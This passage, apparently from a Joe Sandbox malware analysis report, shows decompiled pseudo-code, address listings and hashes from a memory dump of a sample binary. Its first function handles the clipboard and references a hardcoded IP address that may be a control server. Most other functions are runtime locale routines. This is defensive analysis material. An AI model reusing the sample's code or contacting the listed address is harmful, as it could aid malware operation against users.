																					E00402830(_t213, _t275, _t252, _t255, _t275);
																					_t242 = _v40;
																					__eflags = _t242 - 0x10;
																					if(_t242 < 0x10) {
																						L92:
																						 *[fs:0x0] = _v32;
																						_pop(_t258);
																						_pop(_t276);
																						__eflags = _v36 ^ _t290;
																						return E0041361E(_t275, _t213, _v36 ^ _t290, _t252, _t258, _t276);
																					} else {
																						_t252 = _v60;
																						_t240 =  &(_t242->i);
																						_t162 = _v60;
																						__eflags = _t240 - 0x1000;
																						if(_t240 < 0x1000) {
																							L85:
																							_push(_t240);
																							E004138AD(_t252);
																							goto L92;
																						} else {
																							_t252 =  *(_t162 - 4);
																							_t240 =  &(_t240[8]);
																							__eflags = _t162 - _t252 + 0xfffffffc - 0x1f;
																							if(_t162 - _t252 + 0xfffffffc > 0x1f) {
																								L93:
																								E0041805F(_t213, _t240, _t252);
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								return 0x444f38;
																							} else {
																								goto L85;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			L76:
																			CloseClipboard();
																			goto L77;
																		}
																	}
																} else {
																	goto L71;
																}
															}
														}
													} else {
														_t224 = _v20;
														_t61 = _t181 + 0x23; // 0x23
														_t251 = _v16;
														_t255 = _t61 & 0xffffffe0;
														 *(_t255 - 4) = _t181;
														L51:
														 *_t211 = _t255;
														goto L52;
													}
												}
											}
										} else {
											_t250 = _v12;
											_t27 = _t201 + 0x23; // 0x23
											_t269 = _t27 & 0xffffffe0;
											 *(_t269 - 4) = _t201;
											L31:
											 *((intOrPtr*)(_t210 + 0x10)) = _v16;
											 *(_t210 + 0x14) = _t254;
											_t262 = _t269 + _t250;
											_v16 = _t262;
											__eflags = _v20 - 0x10;
											_v12 = _a12 + _t262;
											_push(_t250);
											if(_v20 < 0x10) {
												_push(_t210);
												_push(_t269);
												E00414BF0();
												E00414BF0(_t262, _v24, _a12);
												 *_v12 = 0;
												 *_t210 = _t269;
												return _t210;
											} else {
												_t264 =  *_t210;
												_push(_t264);
												_push(_t269);
												E00414BF0();
												E00414BF0(_v16, _v24, _a12);
												_t298 = _t298 + 0x18;
												_t247 = _v20 + 1;
												 *_v12 = 0;
												__eflags = _t247 - 0x1000;
												if(_t247 < 0x1000) {
													L35:
													_push(_t247);
													E004138AD(_t264);
													 *_t210 = _t269;
													return _t210;
												} else {
													_t250 =  *((intOrPtr*)(_t264 - 4));
													_t222 = _t247 + 0x23;
													_t254 = _t264 - _t250;
													_t46 = _t254 - 4; // 0x7ffffffb
													__eflags = _t46 - 0x1f;
													if(_t46 > 0x1f) {
														goto L39;
													} else {
														_t264 = _t250;
														goto L35;
													}
												}
											}
										}
									}
								}
							} else {
								_t7 = _t206 + 0x23; // 0x23
								_t217 = _t7 & 0xffffffe0;
								 *(_t217 - 4) = _t206;
								_t109 = _v8;
								L13:
								 *_t109 = _t217;
								 *(_t109 + 0x10) = _t254;
								 *(_t109 + 0x14) = _t268;
								_t203 = E00414BF0(_t217, _v12, _t254);
								 *((char*)(_t254 + _t217)) = 0;
								return _t203;
							}
						}
					} else {
						 *(__ecx + 0x10) = _t254;
						return E00414BF0(__ecx, _t221, _t254);
					}
				}
			}

0x00402830
0x00402830
0x00402830
0x00402831
0x00402833
0x00402836
0x00402837
0x0040283a
0x0040283c
0x0040283f
0x00402842
0x0040284b
0x004028ff
0x00000000
0x00402851
0x00402851
0x0040285b
0x00402872
0x00402873
0x00402876
0x00402879
0x0040287f
0x004028ae
0x004028b0
0x004028b3
0x004028b6
0x004028bc
0x004028c7
0x004028c9
0x004028db
0x004028db
0x004028cb
0x004028d1
0x004028d3
0x004028d6
0x004028d6
0x00000000
0x004028be
0x004028be
0x004028be
0x004028c1
0x004028c3
0x00402904
0x00402904
0x00000000
0x004028c5
0x00000000
0x004028c5
0x004028c3
0x00402881
0x00402886
0x0040288b
0x0040288b
0x0040288e
0x0040288f
0x00402894
0x00402897
0x00402899
0x00402909
0x00402909
0x0040290e
0x0040290f
0x00402910
0x00402911
0x00402913
0x00402919
0x0040291a
0x0040291c
0x0040291f
0x00402926
0x00402927
0x0040292c
0x0040292f
0x00402932
0x00402933
0x00402935
0x00402a5b
0x00000000
0x0040293b
0x0040293b
0x0040293e
0x00402943
0x00402946
0x00402949
0x0040294c
0x0040294e
0x0040297b
0x0040297d
0x0040297f
0x00402981
0x0040298a
0x0040298c
0x0040298e
0x00402991
0x00402991
0x00402994
0x0040299a
0x004029a9
0x004029ab
0x004029bd
0x004029bd
0x004029ad
0x004029ae
0x004029b3
0x004029b6
0x004029b9
0x004029b9
0x00000000
0x0040299c
0x0040299c
0x0040299c
0x0040299f
0x004029a1
0x00402a60
0x00402a60
0x00000000
0x004029a7
0x00000000
0x004029a7
0x004029a1
0x00402983
0x00402983
0x00000000
0x00402983
0x00402950
0x00402950
0x00402952
0x00402957
0x00402957
0x0040295a
0x0040295b
0x00402960
0x00402963
0x00402965
0x00402a65
0x00402a65
0x00402a6a
0x00402a6b
0x00402a6c
0x00402a6d
0x00402a6e
0x00402a6f
0x00402a70
0x00402a71
0x00402a73
0x00402a76
0x00402a79
0x00402a7f
0x00402a80
0x00402a82
0x00402a8b
0x00402a8d
0x00402a8e
0x00402a93
0x00402a96
0x00402a99
0x00402a9c
0x00402a9f
0x00402aa6
0x00402aad
0x00402aae
0x00402ab0
0x00402ab2
0x00402b28
0x00402b2c
0x00402b30
0x00402b33
0x00402b41
0x00402b44
0x00402b4f
0x00402b5b
0x00402ab4
0x00402ab6
0x00402ab9
0x00402abf
0x00402af5
0x00402af7
0x00402afa
0x00402afd
0x00402b02
0x00402b0d
0x00402b0f
0x00402b24
0x00402b24
0x00402b11
0x00402b12
0x00402b17
0x00402b1a
0x00402b1d
0x00402b20
0x00402b20
0x00000000
0x00402b04
0x00402b04
0x00402b04
0x00402b07
0x00402b09
0x00402b5e
0x00000000
0x00402b0b
0x00000000
0x00402b0b
0x00402b09
0x00402ac1
0x00402ac6
0x00402acb
0x00402acb
0x00402ace
0x00402acf
0x00402ad4
0x00402ad7
0x00402ad9
0x00402b63
0x00402b63
0x00402b68
0x00402b69
0x00402b6a
0x00402b6b
0x00402b6c
0x00402b6d
0x00402b6e
0x00402b6f
0x00402b70
0x00402b71
0x00402b73
0x00402b74
0x00402b75
0x00402b78
0x00402b7e
0x00402b80
0x00402c1b
0x00402c1b
0x00402c1b
0x00402b86
0x00402b86
0x00402b8c
0x00402b8e
0x00402bab
0x00402bad
0x00402baf
0x00402bc0
0x00402bc2
0x00402bc4
0x00402bce
0x00402bd8
0x00402be0
0x00402be5
0x00402be9
0x00402bef
0x00402bf1
0x00402c0e
0x00402c0e
0x00402c15
0x00000000
0x00402bf3
0x00402bf6
0x00402bfc
0x00402bfe
0x00000000
0x00402c00
0x00402c00
0x00402c06
0x00402c08
0x00000000
0x00402c0a
0x00402c0a
0x00402c0a
0x00402c08
0x00402bfe
0x00402bc6
0x00402bc6
0x00000000
0x00402bc6
0x00402bb1
0x00402bb1
0x00000000
0x00402bb1
0x00402b90
0x00402b90
0x00000000
0x00402b90
0x00402b8e
0x00402c1d
0x00402c20
0x00402c23
0x00402c4d
0x00402c53
0x00402c25
0x00402c25
0x00402c28
0x00402c29
0x00402c2b
0x00402c31
0x00402c43
0x00402c43
0x00402c45
0x00000000
0x00402c33
0x00402c33
0x00402c36
0x00402c3e
0x00402c41
0x00402c54
0x00402c59
0x00402c5a
0x00402c5b
0x00402c5c
0x00402c5d
0x00402c5e
0x00402c5f
0x00402c60
0x00402c61
0x00402c63
0x00402c65
0x00402c70
0x00402c74
0x00402c79
0x00402c7b
0x00402c7e
0x00402c7f
0x00402c80
0x00402c84
0x00402c8a
0x00402c8c
0x00402c91
0x00402c94
0x00402c9a
0x00402c9c
0x00402cb2
0x00402cb2
0x00402cb7
0x00402cba
0x00402cbc
0x00402cc3
0x00402cc8
0x00402ccf
0x00000000
0x00402c9e
0x00402ca6
0x00402ca8
0x00402caa
0x00402ce0
0x00402ce2
0x00402ce4
0x00000000
0x00402ce6
0x00402ce6
0x00402ce8
0x00402cef
0x00402cf2
0x00402cf9
0x00402cfd
0x00402d00
0x00402d03
0x00402d03
0x00402d05
0x00402d06
0x00402d06
0x00402d0d
0x00402d0e
0x00402d12
0x00402d18
0x00402d1f
0x00402d25
0x00402d27
0x00402d8b
0x00402d91
0x00402d94
0x00402d97
0x00402d9e
0x00402da5
0x00402da7
0x00402dde
0x00402de2
0x00402de5
0x00402dea
0x00000000
0x00402da9
0x00402da9
0x00402daa
0x00402db1
0x00402db6
0x00402db9
0x00402dbc
0x00000000
0x00402dbe
0x00402dbe
0x00402dc1
0x00402dc2
0x00402dc4
0x00402dca
0x00000000
0x00402dcc
0x00402dcc
0x00402dcf
0x00402dd7
0x00402dda
0x00000000
0x00402ddc
0x00000000
0x00402ddc
0x00402dda
0x00402dca
0x00402dbc
0x00402d29
0x00402d29
0x00402d2f
0x00402d34
0x00402d36
0x00402d39
0x00402d3e
0x00402d45
0x00402d4c
0x00402d51
0x00402d54
0x00402d57
0x00402def
0x00402df4
0x00402dfc
0x00402dfd
0x00402e01
0x00402e0b
0x00402d5d
0x00402d5d
0x00402d60
0x00402d61
0x00402d63
0x00402d69
0x00402d7f
0x00402d7f
0x00402d81
0x00000000
0x00402d6b
0x00402d6b
0x00402d6e
0x00402d76
0x00402d79
0x00402e0c
0x00402e0c
0x00402e11
0x00402e12
0x00402e13
0x00402e14
0x00402e15
0x00402e16
0x00402e17
0x00402e18
0x00402e19
0x00402e1a
0x00402e1b
0x00402e1c
0x00402e1d
0x00402e1e
0x00402e1f
0x00402e25
0x00000000
0x00000000
0x00000000
0x00402d79
0x00402d69
0x00402d57
0x00402d27
0x00402cac
0x00402cac
0x00402cac
0x00000000
0x00402cac
0x00402caa
0x00000000
0x00000000
0x00000000
0x00402c41
0x00402c31
0x00402adf
0x00402adf
0x00402ae2
0x00402ae5
0x00402ae8
0x00402aeb
0x00402b26
0x00402b26
0x00000000
0x00402b26
0x00402ad9
0x00402abf
0x0040296b
0x0040296b
0x0040296e
0x00402971
0x00402974
0x004029bf
0x004029c2
0x004029c8
0x004029cb
0x004029d0
0x004029d3
0x004029d7
0x004029da
0x004029db
0x00402a32
0x00402a33
0x00402a34
0x00402a40
0x00402a4b
0x00402a51
0x00402a58
0x004029dd
0x004029dd
0x004029df
0x004029e0
0x004029e1
0x004029ef
0x004029f7
0x004029fd
0x004029fe
0x00402a01
0x00402a07
0x00402a1b
0x00402a1b
0x00402a1d
0x00402a25
0x00402a2f
0x00402a09
0x00402a09
0x00402a0c
0x00402a0f
0x00402a11
0x00402a14
0x00402a17
0x00000000
0x00402a19
0x00402a19
0x00000000
0x00402a19
0x00402a17
0x00402a07
0x004029db
0x00402965
0x0040294e
0x0040289b
0x0040289b
0x0040289e
0x004028a1
0x004028a4
0x004028dd
0x004028e1
0x004028e4
0x004028e7
0x004028ea
0x004028f2
0x004028fc
0x004028fc
0x00402899
0x0040285d
0x00402860
0x0040286f
0x0040286f
0x0040285b

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00402904

Strings

45.159.189.105, xrefs: 0040285F

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: 45.159.189.105
API String ID: 118556049-662334292
Opcode ID: 978065179e51d65b8de00e6d3496d99f29e8a4fbbf39a2ea39a96b23100e2d96
Instruction ID: 71df9860eed0ca3b424fdc2ea3185412ac39c8c989fabe0bd7de3ce6336b4286
Opcode Fuzzy Hash: 978065179e51d65b8de00e6d3496d99f29e8a4fbbf39a2ea39a96b23100e2d96
Instruction Fuzzy Hash: 53021771A002049BDB149F68D9487AFB7B5EF85310F14423EF815A73D1DBB8DE818BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0042BA4D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E0042BA4D(void* __ecx, void* __edx, signed short _a4, signed short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				signed short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				signed short _t48;
				int _t49;
				void* _t53;
				signed short* _t57;
				signed short _t70;
				intOrPtr _t73;
				void* _t75;
				signed short _t76;
				intOrPtr _t83;
				short* _t86;
				signed short _t89;
				signed short* _t99;
				void* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x443048; // 0x35200185
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E00420590(__ecx, __edx, _t101) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00420590(__ecx, __edx, _t101);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x437c54; // 0x17
					E0042B9EC(_t89, 0, 0x437b40, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					if(_t48 == 0 ||  *_t48 == _t97) {
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
					} else {
						E0042B38B(_t89, _t97,  &_v20);
						_pop(_t89);
					}
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0 ||  *_t70 == _t97) {
						E0042B471(_t89, _t97,  &_v20);
					} else {
						E0042B3D6(_t89, _t97,  &_v20);
					}
					_pop(_t89);
					if(_v20 != 0) {
						_t100 = 0;
						goto L25;
					} else {
						_t73 =  *0x437b3c; // 0x41
						_t75 = E0042B9EC(_t89, _t97, "X|C", _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t101 = E0042B878(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
								if(_t101 == 0 || IsValidCodePage(_t101 & 0x0000ffff) == 0 || IsValidLocale(_v16, 1) == 0) {
									goto L22;
								} else {
									_t57 = _v28;
									if(_t57 != 0) {
										 *_t57 = _t101;
									}
									E0042352F(_v16,  &(_v24[0x128]), 0x55, _t100);
									if(_t86 == 0) {
										L34:
										_t53 = 1;
										L23:
										return E0041361E(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
									} else {
										_t33 =  &(_t86[0x90]); // 0xd0
										E0042352F(_v16, _t33, 0x55, _t100);
										if(GetLocaleInfoW(_v16, 0x1001, _t86, 0x40) == 0) {
											goto L22;
										}
										_t36 =  &(_t86[0x40]); // 0x30
										if(GetLocaleInfoW(_v12, 0x1002, _t36, 0x40) == 0) {
											goto L22;
										}
										_t38 =  &(_t86[0x80]); // 0xb0
										E0042FD1E(_t38, _t101, _t38, 0x10, 0xa);
										goto L34;
									}
								}
							}
							L22:
							_t53 = 0;
							goto L23;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0 ||  *_t76 == 0) {
							E0042B471(_t89, _t97,  &_v20);
						} else {
							E0042B3D6(_t89, _t97,  &_v20);
						}
						_pop(_t89);
						goto L21;
					}
				}
			}

0x0042ba55
0x0042ba5c
0x0042ba63
0x0042ba67
0x0042ba6b
0x0042ba79
0x0042ba7e
0x0042ba7f
0x0042ba80
0x0042ba81
0x0042ba89
0x0042ba8b
0x0042ba91
0x0042ba97
0x0042ba9a
0x0042ba9c
0x0042ba9f
0x0042baa3
0x0042baaa
0x0042bab7
0x0042babc
0x0042babf
0x0042bac2
0x0042bac2
0x0042bac4
0x0042bac7
0x0042bacb
0x0042bb3b
0x0042bb3f
0x0042bb52
0x0042bb59
0x0042bb5f
0x0042bb62
0x0042bb46
0x0042bb4a
0x0042bb4f
0x0042bb4f
0x00000000
0x0042bad2
0x0042bad2
0x0042bad6
0x0042baec
0x0042badd
0x0042bae1
0x0042bae1
0x0042baf5
0x0042baf6
0x0042bb7e
0x00000000
0x0042bafc
0x0042bafc
0x0042bb0b
0x0042bb10
0x0042bb15
0x0042bb65
0x0042bb65
0x0042bb67
0x0042bb6b
0x0042bb80
0x0042bb8c
0x0042bb96
0x0042bb9c
0x00000000
0x0042bbbb
0x0042bbbb
0x0042bbc0
0x0042bbc2
0x0042bbc2
0x0042bbd3
0x0042bbda
0x0042bc3a
0x0042bc3c
0x0042bb6f
0x0042bb7d
0x0042bbdc
0x0042bbdf
0x0042bbe9
0x0042bc01
0x00000000
0x00000000
0x0042bc09
0x0042bc20
0x00000000
0x00000000
0x0042bc2a
0x0042bc32
0x00000000
0x0042bc37
0x0042bbda
0x0042bb9c
0x0042bb6d
0x0042bb6d
0x00000000
0x0042bb6d
0x0042bb17
0x0042bb19
0x0042bb1d
0x0042bb33
0x0042bb24
0x0042bb28
0x0042bb28
0x0042bb38
0x00000000
0x0042bb38
0x0042baf6

APIs

Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0042BB59
IsValidCodePage.KERNEL32(00000000), ref: 0042BBA2
IsValidLocale.KERNEL32(?,00000001), ref: 0042BBB1
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0042BBF9
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0042BC18

Strings

X|C, xrefs: 0042BB06

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID: X|C
API String ID: 415426439-4054941898
Opcode ID: 9cab679f02e88f86f742118bdc0e297988c68e7abe25fb9b670304d9ba666abc
Instruction ID: 99ea592d9ec8dd99113bf41f193dc7b7e704182953ba15e308239c6b1a999779
Opcode Fuzzy Hash: 9cab679f02e88f86f742118bdc0e297988c68e7abe25fb9b670304d9ba666abc
Instruction Fuzzy Hash: 4E51A671B00229AFDF10DFA5EC41ABF77B8EF04700F94046AE900E7295DB78AA40C799

Uniqueness

Uniqueness Score: -1.00%

Function 0042B0E9 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E0042B0E9(void* __ecx, void* __edx, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t87;
				void* _t89;
				intOrPtr* _t92;
				intOrPtr* _t96;
				short _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t119;
				signed int* _t120;
				void* _t121;
				void* _t122;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t128;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_push(_t122);
				_t117 = _a4;
				_t33 = E00420590(__ecx, __edx, _t122);
				_t114 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t84 = _t6;
				_v8 = _t34;
				_t92 = _t117;
				_t35 = _t117 + 0x80;
				 *_t123 = _t117;
				 *_t84 = _t35;
				if( *_t35 != 0) {
					E0042B07C(0x437b40, 0x16, _t84);
					_t92 =  *_t123;
					_t131 = _t131 + 0xc;
					_t114 = 0;
				}
				_push(_t123);
				if( *_t92 == _t114) {
					E0042A9ED(_t84, _t92);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t84)) == _t114) {
						E0042AB0D();
					} else {
						E0042AA74(_t92);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E0042B07C("X|C", 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t84)) == 0) {
								E0042AB0D();
							} else {
								E0042AA74(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t117 + 0x100;
					if( *_t117 != 0 ||  *_t38 != 0) {
						_t39 = E0042AF39(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t96 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t87 = _t15;
							 *_t87 = 0;
							_t16 = _t96 + 2; // 0x2
							_t115 = _t16;
							do {
								_t45 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t45 != _v12);
							_t18 = (_t96 - _t115 >> 1) + 1; // -1
							_t47 = E0042812A(_t96 - _t115 >> 1, _t87, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E0041807C();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x443048; // 0x35200185
								_v52 = _t50 ^ _t132;
								_push(_t87);
								_push(_t125);
								_t126 = _v40;
								_push(_t119);
								_t52 = E00420590(_t98, _t115, _v40);
								_t88 = _t52;
								_t120 =  *(E00420590(_t98, _t115, _v40) + 0x34c);
								_t127 = E0042B824(_t126);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E00427E64(_t120, _t127,  *((intOrPtr*)(_t88 + 0x54)),  &_v272) == 0 && E0042B959(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								_pop(_t121);
								_pop(_t128);
								_pop(_t89);
								return E0041361E(_t62, _t89, _v32 ^ _t130, _t115, _t121, _t128);
							} else {
								if(E00423431(_t87, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t87 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E00423431(_t21, 0x1002, _t87, 0x40) == 0) {
										goto L37;
									} else {
										_t68 = E00431247(_t87, 0x5f);
										_pop(_t98);
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E00423431(_t22, 7, _t87, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_t73 = E00431247(_t87, 0x2e);
											_pop(_t98);
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E0042FD1E(_t98, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E0042812A(_t98, _t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x0042b0ee
0x0042b0ef
0x0042b0f1
0x0042b0f3
0x0042b0f6
0x0042b0fd
0x0042b0ff
0x0042b102
0x0042b102
0x0042b105
0x0042b105
0x0042b10b
0x0042b10e
0x0042b111
0x0042b111
0x0042b114
0x0042b117
0x0042b119
0x0042b11f
0x0042b121
0x0042b126
0x0042b130
0x0042b135
0x0042b137
0x0042b13a
0x0042b13a
0x0042b13c
0x0042b140
0x0042b189
0x00000000
0x0042b142
0x0042b147
0x0042b150
0x0042b149
0x0042b149
0x0042b149
0x0042b15b
0x0042b165
0x0042b16a
0x0042b16f
0x0042b175
0x0042b179
0x0042b182
0x0042b17b
0x0042b17b
0x0042b17b
0x0042b18e
0x0042b18e
0x0042b16f
0x0042b15b
0x0042b194
0x0042b2d0
0x0042b2d0
0x00000000
0x0042b19a
0x0042b19a
0x0042b1a3
0x0042b1b4
0x0042b1aa
0x0042b1aa
0x0042b1aa
0x0042b1bb
0x0042b1bf
0x00000000
0x0042b1e3
0x0042b1e3
0x0042b1e8
0x0042b1ea
0x0042b1ea
0x0042b1ec
0x0042b1f1
0x0042b2cb
0x0042b2cd
0x0042b2d2
0x0042b2d6
0x0042b1f7
0x0042b1f7
0x0042b1fa
0x0042b1fa
0x0042b202
0x0042b205
0x0042b205
0x0042b208
0x0042b208
0x0042b20b
0x0042b20e
0x0042b218
0x0042b222
0x0042b227
0x0042b22c
0x0042b2d7
0x0042b2d9
0x0042b2da
0x0042b2db
0x0042b2dc
0x0042b2dd
0x0042b2de
0x0042b2e3
0x0042b2e7
0x0042b2ef
0x0042b2f6
0x0042b2f9
0x0042b2fa
0x0042b2fb
0x0042b2fe
0x0042b2ff
0x0042b304
0x0042b30c
0x0042b31b
0x0042b327
0x0042b338
0x0042b340
0x0042b35a
0x0042b367
0x0042b36a
0x0042b36d
0x0042b36d
0x0042b377
0x0042b342
0x0042b342
0x0042b344
0x0042b344
0x0042b37d
0x0042b37e
0x0042b381
0x0042b388
0x0042b232
0x0042b242
0x00000000
0x0042b248
0x0042b24a
0x0042b24a
0x0042b256
0x0042b264
0x00000000
0x0042b266
0x0042b269
0x0042b26f
0x0042b272
0x0042b282
0x0042b287
0x0042b295
0x00000000
0x00000000
0x00000000
0x00000000
0x0042b274
0x0042b277
0x0042b27d
0x0042b280
0x0042b297
0x0042b297
0x0042b2a3
0x0042b2c3
0x00000000
0x0042b2a5
0x0042b2a5
0x0042b2af
0x0042b2b4
0x0042b2b9
0x00000000
0x0042b2bb
0x00000000
0x0042b2bb
0x0042b2b9
0x00000000
0x00000000
0x00000000
0x0042b280
0x0042b272
0x0042b264
0x0042b242
0x0042b22c
0x0042b1f1
0x0042b1bf

APIs

Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636

GetACP.KERNEL32(?,?,?,?,?,?,0041EBEC,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0042B1AA
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0041EBEC,?,?,?,00000055,?,-00000050,?,?), ref: 0042B1D5
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0042B338

Strings

X|C, xrefs: 0042B160
utf8, xrefs: 0042B2A7

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: X|C$utf8
API String ID: 607553120-1629001950
Opcode ID: 709f726eb666b79f5bad23149724d9554512e537e0563fa609d3dd05eea2a28b
Instruction ID: 6faa104a8387bd1dbd1e95285a211f66402bec9412bb850d11afb6633de07d9a
Opcode Fuzzy Hash: 709f726eb666b79f5bad23149724d9554512e537e0563fa609d3dd05eea2a28b
Instruction Fuzzy Hash: 3B71F731700326AAE724AB75EC56B7B73A8EF04344F94046BF905D7281EB7CA950C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0042B878 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0042B878(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
